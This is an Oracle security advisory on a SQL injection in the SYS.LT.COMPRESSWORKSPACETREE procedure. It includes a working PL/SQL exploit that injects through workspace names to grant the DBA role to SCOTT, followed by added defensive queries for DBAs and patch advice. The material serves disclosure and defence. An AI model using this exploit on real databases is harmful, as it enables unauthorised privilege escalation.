Oracle 10g SYS.LT.COMPRESSWORKSPACETREE SQL Injection Exploit

Name: Oracle 10g SYS.LT.COMPRESSWORKSPACETREE SQL Injection Exploit
Systems Affected: Oracle Database Server versions 9iR2, 10gR1, 10gR2 and 11gR1
Severity: High Risk
Category: Escalate User Privileges
Vendor URL: http://www.oracle.com/
Credit: Esteban Martinez Fayo
Exploit: http://www.milw0rm.com
Date: 2 Jul 2009

Details

The COMPRESSWORKSPACETREE procedure is owned by SYS or by WMSYS (depending on the Oracle version). A user can call this procedure with malicious code, execute
PL/SQL statements and elevate privileges as if the user were the package owner.

Example
Example written by Sumit Siddharth

SQL> DECLARE
D NUMBER;
BEGIN
D := DBMS_SQL.OPEN_CURSOR;
DBMS_SQL.PARSE(D,'declare pragma autonomous_transaction; begin execute immediate ''grant dba to scott'';commit;end;',0);
SYS.LT.CREATEWORKSPACE('a''and dbms_sql.execute('||D||')=1--');
SYS.LT.COMPRESSWORKSPACETREE('a''and dbms_sql.execute('||D||')=1--');
end;
/




Patch Information
Apply the latest Oracle security patches (e.g. CPU April 2009).
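
The following checks are an added example for DBAs and are not part of the original advisory: they list who can execute the LT package, who holds the DBA role, which workspace names contain SQL metacharacters, and which CPUs are recorded. They assume a DBA-privileged session, that the Workspace Manager view DBA_WORKSPACES is installed, and that DBA_REGISTRY_HISTORY is available (10gR2 and later).

```sql
-- Added example: defensive checks, run from a DBA-privileged session.

-- 1. Who may execute the LT package? The owner is SYS or WMSYS,
--    depending on the Oracle version (see Details above).
SELECT grantee, owner, table_name, privilege
FROM   dba_tab_privs
WHERE  table_name = 'LT'
AND    owner IN ('SYS', 'WMSYS')
AND    privilege = 'EXECUTE'
ORDER  BY grantee;

-- 2. Who holds the DBA role? The example above grants DBA to SCOTT,
--    so any grantee that is not an expected administrator needs review.
SELECT grantee, admin_option, default_role
FROM   dba_role_privs
WHERE  granted_role = 'DBA'
ORDER  BY grantee;

-- 3. Workspace names that contain a quote, a comment marker or a
--    DBMS_SQL call. Legitimate workspace names do not look like this.
--    Assumption: DBA_WORKSPACES is present (Workspace Manager installed).
SELECT workspace, owner
FROM   dba_workspaces
WHERE  workspace LIKE '%''%'
OR     workspace LIKE '%--%'
OR     UPPER(workspace) LIKE '%DBMS_SQL%';

-- 4. Which Critical Patch Updates are recorded for this database?
--    Compare the result with the patch level named under Patch Information.
SELECT action_time, action, version, id, comments
FROM   dba_registry_history
ORDER  BY action_time;
```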





2009 by Red-Database-Security GmbH - last update 19-jun-2009

Definition Exploit
"Exploit" is a common term in computer security for a piece of software that takes advantage of a bug or vulnerability, leading to a privilege escalation or DoS on a computer system.
Computer security experts use exploit code to test whether a patch is working properly.